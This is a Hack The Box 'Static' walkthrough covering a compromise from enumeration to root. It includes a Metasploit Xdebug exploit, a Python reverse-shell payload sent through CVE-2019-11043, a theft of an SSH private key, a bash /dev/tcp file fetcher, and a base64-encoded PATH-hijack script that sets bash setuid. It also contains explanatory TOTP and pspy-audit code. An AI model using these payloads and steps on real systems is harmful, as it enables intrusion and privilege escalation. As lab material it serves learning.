Hack_The_Box_Writeups

HackTheBox – Static Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.10.246

http://10.10.10.246:8080/

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt

http://10.10.10.246:8080/robots.txt

http://10.10.10.246:8080/vpn/

http://10.10.10.246:8080/.ftp_uploads/

http://10.10.10.246:8080/.ftp_uploads/warning.txt

┌──(rootkali)-[/home/kali/Downloads]

└─# apt-get install g++

After some googling I found a tool to repair the corrupted gzip file.

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/yonjar/fixgz.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd fixgz/

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls -la 

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# g++ fixgz.cpp -o fixgz

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls   

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ./fixgz /home/kali/Downloads/db.sql.gz db.gz

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# gunzip db.gz

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls -la

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# cat db

Found the username (admin), a password hash (d033e22ae348aeb5660fc2140aec35850c4da997) and a TOTP secret (orxxi4c7orxwwzlo).

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# cat hash 

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# john hash

http://10.10.10.246:8080/vpn/login.php

username: admin

password: admin

The good news is that we also have the TOTP secret (orxxi4c7orxwwzlo).

┌──(rootkali)-[/home/kali/Downloads]

└─# curl -I http://10.10.10.246:8080

┌──(rootkali)-[/home/kali/Downloads]

└─# date -s "17 Dec 2021 06:52:44"

┌──(rootkali)-[/home/kali/Downloads]

└─# timedatectl set-time "08:20:43"

https://totp.app/

Enter the generated token and we are in.
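The clock reset above matters because a TOTP code is a function of the current 30-second time step, not of the secret alone. The following is an added example (not from the original walkthrough) that computes the RFC 6238 code for the recovered secret and applies the skew taken from the server's Date header instead of changing the system clock; RFC_TEST_SECRET and the sample header value are assumptions used for illustration.

```python
import base64
import hashlib
import hmac
import struct
import time
from email.utils import parsedate_to_datetime

SECRET_FROM_DB = "orxxi4c7orxwwzlo"   # base32 TOTP seed recovered from db.sql above
RFC_TEST_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"  # base32 of "12345678901234567890" (RFC 6238 vectors)


def totp(secret_b32: str, unix_time: int, digits: int = 6, step: int = 30) -> str:
    """RFC 6238 TOTP (HMAC-SHA1, 30 s steps) for the given base32 secret at unix_time."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    counter = int(unix_time) // step                      # time step, not the raw clock
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def server_unix_time(date_header: str) -> int:
    """Unix time from the Date header that `curl -I` printed."""
    return int(parsedate_to_datetime(date_header).timestamp())


def clock_skew_seconds(date_header: str, local_unix: int) -> int:
    """Seconds the server clock is ahead of ours (negative if behind), measured at fetch time."""
    return server_unix_time(date_header) - local_unix


def code_for_server(secret_b32: str, date_header: str, fetched_at: int, now: int) -> str:
    """Code the server accepts at local time `now`: apply the skew measured at `fetched_at`
    instead of resetting the system clock with `date -s`."""
    return totp(secret_b32, now + clock_skew_seconds(date_header, fetched_at))


if __name__ == "__main__":
    # Constructed header in the shape curl -I prints, using the time the walkthrough set.
    hdr = "Fri, 17 Dec 2021 06:52:44 GMT"
    t = int(time.time())
    print("skew (s):", clock_skew_seconds(hdr, t))
    print("local-clock code:", totp(SECRET_FROM_DB, t))
    print("server-clock code:", code_for_server(SECRET_FROM_DB, hdr, t, t))
```

Run it right after `curl -I` so the measured skew is current; a skew larger than one step is exactly the case where a code generated from the local clock is rejected.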

Common name: web

Click on generate

┌──(rootkali)-[/home/kali/Downloads]

└─# ls -lrt | grep web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# openvpn web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# cat web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.10.246

┌──(rootkali)-[/home/kali/Downloads]

└─# openvpn web.ovpn

Now let's browse to this web IP.

But it keeps loading and we can't see the web page.

In the image we see that we have two interfaces, tun0 and tun9. tun9 has the IP 172.30.0.9, while the web page we want to reach is at 172.20.0.10.

┌──(rootkali)-[/home/kali/Downloads]

└─# ifconfig

So we need to add a route through the tun9 interface to reach the web page.

┌──(rootkali)-[/home/kali/Downloads]

└─# ip route add 172.20.0.0/24 dev tun9

And now we can access the web page.

Let’s go to info.php

http://172.20.0.10/

http://172.20.0.10/info.php

Found Xdebug; let's look for an exploit for it.

https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

msf6 > use exploit/unix/http/xdebug_unauth_exec

msf6 exploit(unix/http/xdebug_unauth_exec) > set PATH /vpn/login.php

msf6 exploit(unix/http/xdebug_unauth_exec) > set RHOSTS 172.20.0.10

msf6 exploit(unix/http/xdebug_unauth_exec) > set LHOST tun9

msf6 exploit(unix/http/xdebug_unauth_exec) > set LPORT 9001

msf6 exploit(unix/http/xdebug_unauth_exec) > options

Now let’s run the exploit.

Boom, we got a shell.

msf6 exploit(unix/http/xdebug_unauth_exec) > run

meterpreter > shell

pwd

cd /home/www-data/.ssh

ls -al

cat id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa www-data@10.10.10.246

Let's try the custom SSH port 2222 which we saw in the nmap scan.

And we got user.txt.

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa www-data@10.10.10.246 -p 2222   

www-data@web:~$ cd /home

www-data@web:/home$ ls -lrt

www-data@web:/home$ cat user.txt

Privilege escalation

If you look at the Support Portal, there is another network with the IP 192.168.254.3.

www-data@web:/home$ ifconfig

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p2222 -i id_rsa

Now let's browse to localhost (127.0.0.1) and we get the page.

There is nothing on the website; it just says batch mode: /usr/bin/ersatool...

http://localhost/

And if we check the headers we see PHP-FPM/7.1 is running; let's look for an exploit for that.

https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc

https://github.com/theMiddleBlue/CVE-2019-11043

After reading the article I understood how to exploit this and get a reverse shell.

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/theMiddleBlue/CVE-2019-11043.git

┌──(rootkali)-[/home/kali/Downloads]

└─# mv CVE-2019-11043/exploit.py .

┌──(rootkali)-[/home/kali/Downloads]

└─# rm -rf CVE-2019-11043/

┌──(rootkali)-[/home/kali/Downloads]

└─# ls -al | grep exploit.py

┌──(rootkali)-[/home/kali/Downloads]

└─# cat dedsec.py

CODE:

import requests

# Reverse-shell one-liner, single-quoted for the shell, that the vulnerable index.php will run
payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''

# Pass the command through the ?a= parameter and print whatever the server returns
r = requests.get("http://192.168.254.3/index.php?a=" + payload)

print(r.text)

https://github.com/H74N/netcat-binaries/blob/master/nc

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa nc www-data@10.10.10.246:/tmp/nc

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa exploit.py www-data@10.10.10.246:/tmp/exploit.py

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa dedsec.py www-data@10.10.10.246:/tmp/dedsec.py

www-data@web:~$ cd /tmp

www-data@web:/tmp$ ls -lrt

www-data@web:/tmp$ chmod +x nc

www-data@web:/tmp$ ./nc -nlvp 9001

On another terminal

www-data@web:/home$ cd /tmp

www-data@web:/tmp$ python3 exploit.py --url http://192.168.254.3/index.php

www-data@web:/tmp$ python3 dedsec.py

On listener

www-data@pki:~/html$ id

www-data@pki:~/html$ pwd

www-data@pki:~/html$ ls

Now, if you remember, we saw a file called ersatool on the web page. Let's check that file.

After checking it I knew that it is a binary which runs as root.

www-data@pki:~/html$ ls -al  /usr/bin/ersatool

www-data@pki:~/html$ file /usr/bin/ersatool

And after some enumeration I found the source code of that file.

www-data@pki:~/html$ cd /usr/bin

www-data@pki:/usr/bin$ find / -name ersatool.* 2>/dev/null

www-data@pki:/usr/bin$ cat /usr/src/ersatool.c

So we have two methods for getting root:
1. using the format string vulnerability
2. PATH injection
I used PATH injection.

So let's monitor the binary's calls with pspy. The problem is how to transfer the pspy binary to that machine, because there is no curl, wget or anything else for that.

But I found a way to transfer pspy to the machine with the help of this article.

Link : how to download a file using just bash and nothing else

With the help of this bash script I will transfer the pspy binary.

https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et

https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa pspy64s www-data@10.10.10.246:/tmp/pspy

www-data@web:/tmp$ ls -lrt

www-data@web:/tmp$ python3 -m http.server 1337

Follow the steps again to get a second shell with dedsec.py, because we want two shells: the first for running pspy, the second for running the ersatool binary.

Once everything is ready, go to the shell we got from dedsec.py and paste the whole script into the terminal:
1. go to the /tmp directory
2. create a directory www
3. paste the whole code we got from StackOverflow
4. then call the function with __curl
5. and download the file into the /tmp/www directory

www-data@pki:/usr/bin$ cd /tmp

www-data@pki:/tmp$ mkdir www

www-data@pki:/tmp$ cd www


www-data@pki:/tmp/www$ function __curl() {
>   read proto server path <<<$(echo ${1//// })
>   DOC=/${path// //}
>   HOST=${server//:*}
>   PORT=${server//*:}
>   [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
>
>   exec 3<>/dev/tcp/${HOST}/$PORT
>   echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
>   (while read line; do
>    [[ "$line" == $'\r' ]] && break
>   done && cat) <&3
>   exec 3>&-
> }

www-data@pki:/tmp/www$ __curl http://192.168.254.2:1337/pspy > pspy

Now that pspy is transferred, run it in the first reverse shell.

www-data@pki:/tmp/www$ chmod +x pspy

www-data@pki:/tmp/www$  ./pspy | tee log &

/usr/bin/ersatool

create

a

print

a

b

exit

I captured all calls made by the binary and found that openssl was invoked without its full path.
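To audit a pspy capture for exactly this weakness, here is an added example (not from the original walkthrough): it parses pspy-style CMD lines, lists the programs that root invoked by bare name (and therefore resolved through PATH), and shows the fix on the privileged side, resolving names against a fixed directory list. The log lines and the TRUSTED_DIRS list are constructed for illustration.

```python
import os
import re
from typing import Callable, Dict, List

# pspy prints one line per exec: "<date> <time> CMD: UID=<uid> PID=<pid> | <command line>"
PSPY_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s*(?P<cmd>.*)$"
)

# Constructed sample capture in pspy's output shape (not the real log from the box).
SAMPLE_LOG = """\
2021/12/17 08:21:01 CMD: UID=33   PID=1401   | ./pspy
2021/12/17 08:21:05 CMD: UID=0    PID=1410   | /usr/bin/ersatool
2021/12/17 08:21:09 CMD: UID=0    PID=1412   | sh -c openssl req -new -newkey rsa:2048 -nodes
2021/12/17 08:21:09 CMD: UID=0    PID=1413   | openssl req -new -newkey rsa:2048 -nodes
2021/12/17 08:21:12 CMD: UID=0    PID=1415   | /usr/bin/openssl x509 -req -in a.csr
"""

TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")  # fixed list, independent of PATH

def parse_pspy(log: str) -> List[Dict[str, str]]:
    """Turn pspy output into dicts with ts/uid/pid/cmd; non-CMD lines are skipped."""
    return [m.groupdict() for m in map(PSPY_LINE.match, log.splitlines()) if m]

def argv0(cmd: str) -> str:
    """Program actually looked up: unwrap the `sh -c ...` wrapper that system() adds."""
    parts = cmd.split()
    if len(parts) > 2 and parts[:2] == ["sh", "-c"]:
        parts = parts[2:]
    return parts[0] if parts else ""

def path_hijack_candidates(log: str) -> List[str]:
    """Programs run as root (UID 0) by bare name, i.e. resolved through PATH."""
    found: List[str] = []
    for ev in parse_pspy(log):
        prog = argv0(ev["cmd"])
        if ev["uid"] == "0" and prog and "/" not in prog and prog not in found:
            found.append(prog)
    return found

def resolve_trusted(prog: str, exists: Callable[[str], bool] = os.path.exists) -> str:
    """Mitigation for the privileged caller: resolve a name only against TRUSTED_DIRS."""
    for d in TRUSTED_DIRS:
        candidate = os.path.join(d, prog)
        if exists(candidate):
            return candidate
    raise FileNotFoundError(f"{prog} not found in trusted directories")
```

Feeding the `log` file written by `./pspy | tee log` to `path_hijack_candidates` reproduces the finding above; a setuid or root-run binary that uses `resolve_trusted` (or an absolute path) is unaffected by a caller-controlled PATH.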

┌──(rootkali)-[/home/kali/Downloads]

└─# cat openssl 

┌──(rootkali)-[/home/kali/Downloads]

└─# cat openssl | base64

www-data@pki:~/html$ cd /tmp

www-data@pki:/tmp$ mkdir pwn

www-data@pki:/tmp$ cd pwn

www-data@pki:/tmp/pwn$ echo "IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=" | base64 -d > openssl

www-data@pki:/tmp/pwn$ cat openssl

www-data@pki:/tmp/pwn$ chmod 755 openssl

www-data@pki:/tmp/pwn$ ls -al

www-data@pki:/tmp/pwn$ export PATH=/tmp/pwn:$PATH

www-data@pki:/tmp/pwn$ echo $PATH

www-data@pki:/tmp/pwn$ ersatool

www-data@pki:/tmp/pwn$ ls -al /bin/bash

www-data@pki:/tmp/pwn$ /bin/bash -p
